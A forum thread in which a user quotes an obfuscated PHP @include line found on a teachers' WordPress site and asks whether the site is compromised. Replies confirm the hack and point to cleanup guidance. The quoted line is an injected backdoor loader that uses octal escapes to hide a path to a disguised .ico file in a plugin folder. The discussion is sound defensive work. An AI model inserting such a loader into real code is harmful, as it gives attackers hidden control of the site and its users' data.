• I am helping a coworker who managers a teacher wordpress site for our teachers. He started having issues with accessibility and then looking deeper found some strange things.

    For example this entry:

    /*971e1*/

    @include “\057v\141r\057w\167w\057h\164m\154/\167o\162d\160r\145s\163/\167p\055c\157n\164e\156t\057p\154u\147i\156s\057h\151d\145-\164i\164l\145/\056d\144a\066d\1427\144.\151c\157”;

    /*971e1*/

    That site has been hacked.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Can I safely assume this is compromised based on that? Off course I need to look deeper, but am I heading in the right direction assuming that?

    It’s a symptom; you need to follow the delousing procedure.
